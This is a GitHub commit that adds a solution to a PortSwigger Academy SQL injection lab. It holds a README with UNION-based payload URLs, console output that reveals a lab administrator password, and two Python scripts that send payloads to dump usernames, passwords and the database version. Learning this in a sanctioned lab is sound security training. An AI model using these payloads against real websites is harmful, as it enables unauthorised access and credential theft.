Skip to content

Commit 2123556

Browse files
committed
add sqli lab 06
1 parent 6116fdb commit 2123556

File tree

5 files changed

+196
-0
lines changed

5 files changed

+196
-0
lines changed
Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
# Retrieving multiple values within a single column
2+
3+
In the preceding example, suppose instead that the query only returns a single column.
4+
5+
You can easily retrieve multiple values together within this single column by concatenating the values together, ideally including a suitable separator to let you distinguish the combined values. For example, on Oracle you could submit the input:
6+
7+
`' UNION SELECT username || '~' || password FROM users--`
8+
9+
This uses the double-pipe sequence `||` which is a string concatenation operator on Oracle. The injected query concatenates together the values of the `username` and `password` fields, separated by the `~` character.
10+
11+
The results from the query will let you read all of the usernames and passwords, for example:
12+
13+
`... administrator~s3cure wiener~peter carlos~montoya ...`
14+
15+
Note that different databases use different syntax to perform string concatenation. For more details, see the [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet).
16+
17+
# Lab: SQL injection UNION attack, retrieving multiple values in a single column
18+
19+
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
20+
21+
The database contains a different table called `users`, with columns called `username` and `password`.
22+
23+
To solve the lab, perform an [SQL injection UNION](https://portswigger.net/web-security/sql-injection/union-attacks) attack that retrieves all usernames and passwords, and use the information to log in as the `administrator` user.
24+
25+
#### Hint
26+
27+
You can find some useful payloads on our [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet).
28+
29+
# PoC
30+
- we need to determine the number of columns and how to determine data type of string on the database. we can use the previous source code to the determine number of columns and data type string.
31+
analysis:
32+
`https://ac571f8b1e65b8e6c0bxxxxxxxxxx.web-security-academy.net/filter?category=Accessories' ORDER BY 2--` it doesn't get an error, so the numbers of columns is `2`, then let's use the union attack to find data with string type
33+
`https://ac571f8b1e65b8e6c0bxxxxxxxxxx.web-security-academy.net/filter?category=Accessories
34+
UNION SELECT NULL, 'test'--` the string `test` has been inputed on the column number 2
35+
36+
![1](screenshot/1.png)
37+
38+
- In this case, we need to retrieve all usernames and passwords from the database. here below the following command to retrive all username & password
39+
`https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, username || ':' || password FROM users--`
40+
- we can retrieve the database version from this lab
41+
`https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, version()--`
42+
43+
![2](screenshot/2.png)
44+
45+
```bash
46+
$ python3 sqli_lab_06.py "https://acb91fb01e4afc7dc0d4991700de003a.web-security-academy.net"
47+
48+
>> SQL injection UNION attack, retrieving data from other tables
49+
>> by Port Swigger Academy
50+
51+
[*] Dumping the list of usernames and passwords...
52+
[✓] Found the Administrator password...
53+
[✓] The administrator password is 'sx6gnnlga7ga8cjw1kvd'
54+
```
55+
56+
```bash
57+
$ python3 sqli_lab_06b.py "https://acb91fb01e4afc7dc0d4991700de003a.web-security-academy.net"
58+
59+
>> SQL injection UNION attack, retrieving multiple values in a single column
60+
>> by Port Swigger Academy
61+
62+
[*] Retrive dbms version...
63+
[✓] Found the DBMS version.
64+
[✓] The dbms version is 'PostgreSQL 12.10 (Ubuntu 12.10-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit'
65+
```
Loading
Loading
Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
#!/usr/bin/python3
2+
3+
import requests
4+
import sys
5+
import urllib3
6+
from bs4 import BeautifulSoup
7+
import re
8+
9+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
10+
11+
class Interface ():
12+
def __init__ (self):
13+
self.red = '\033[91m'
14+
self.green = '\033[92m'
15+
self.white = '\033[37m'
16+
self.yellow = '\033[93m'
17+
self.bold = '\033[1m'
18+
self.end = '\033[0m'
19+
20+
def header(self):
21+
print('\n >> SQL injection UNION attack, retrieving multiple values in a single column')
22+
print(' >> by Port Swigger Academy\n')
23+
24+
def info (self, message):
25+
print(f"[{self.white}*{self.end}] {message}")
26+
27+
def warning (self, message):
28+
print(f"[{self.yellow}!{self.end}] {message}")
29+
30+
def error (self, message):
31+
print(f"[{self.red}x{self.end}] {message}")
32+
33+
def success (self, message):
34+
print(f"[{self.green}{self.end}] {self.bold}{message}{self.end}")
35+
36+
# Instantiate our interface class
37+
global output
38+
output = Interface()
39+
output.header()
40+
41+
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
42+
43+
def exploit_sqli_users_table(url):
44+
username = 'administrator'
45+
path = '/filter?category=Gifts'
46+
sqli_payload = "' UNION SELECT NULL, username || ':' || password FROM users--"
47+
r = requests.get(url+path+sqli_payload,verify=False,proxies=proxies)
48+
response = r.text
49+
if 'administrator' in response:
50+
output.success("Found the Administrator password...")
51+
soup = BeautifulSoup(r.text, 'html.parser')
52+
admin_password = soup.find(text=re.compile('.*administrator.*')).split(":")[1]
53+
output.success("The administrator password is '%s'" % admin_password)
54+
return True
55+
return False
56+
57+
if __name__ == "__main__":
58+
try:
59+
url = sys.argv[1].strip()
60+
except IndexError:
61+
output.info("Usage: %s <url>" % sys.argv[0])
62+
output.info("Example: %s www.example.com" % sys.argv[0])
63+
output.info("Dumping the list of usernames and passwords...")
64+
if not exploit_sqli_users_table(url):
65+
output.error("Did not find an administrator password.")
Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
#!/usr/bin/python3
2+
import requests
3+
import sys
4+
import urllib3
5+
from bs4 import BeautifulSoup
6+
import re
7+
8+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9+
10+
class Interface ():
11+
def __init__ (self):
12+
self.red = '\033[91m'
13+
self.green = '\033[92m'
14+
self.white = '\033[37m'
15+
self.yellow = '\033[93m'
16+
self.bold = '\033[1m'
17+
self.end = '\033[0m'
18+
19+
def header(self):
20+
print('\n >> SQL injection UNION attack, retrieving multiple values in a single column')
21+
print(' >> by Port Swigger Academy\n')
22+
23+
def info (self, message):
24+
print(f"[{self.white}*{self.end}] {message}")
25+
26+
def warning (self, message):
27+
print(f"[{self.yellow}!{self.end}] {message}")
28+
29+
def error (self, message):
30+
print(f"[{self.red}x{self.end}] {message}")
31+
32+
def success (self, message):
33+
print(f"[{self.green}{self.end}] {self.bold}{message}{self.end}")
34+
35+
# Instantiate our interface class
36+
global output
37+
output = Interface()
38+
output.header()
39+
40+
proxies = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
41+
42+
43+
def exploit_sqli_dbms_version(url):
44+
path = '/filter?category=Gifts'
45+
sqli_payload = "' UNION SELECT NULL, version()--"
46+
r = requests.get(url+path+sqli_payload,verify=False,proxies=proxies)
47+
response = r.text
48+
if 'PostgreSQL' in response:
49+
output.success(" Found the DBMS version.")
50+
soup = BeautifulSoup(r.text, 'html.parser')
51+
dbms_version = soup.find(text=re.compile('.*PostgreSQL.*'))
52+
output.success(" The dbms version is '%s'" % dbms_version)
53+
return True
54+
return False
55+
56+
if __name__ == "__main__":
57+
try:
58+
url = sys.argv[1].strip()
59+
except IndexError:
60+
output.info(" Usage: %s <url>" % sys.argv[0])
61+
output.info(" Example: %s www.example.com" % sys.argv[0])
62+
sys.exit(-1)
63+
64+
output.info(" Retrive dbms version...")
65+
if not exploit_sqli_dbms_version(url):
66+
output.error(" Did not find and dbms version")

0 commit comments

Comments
 (0)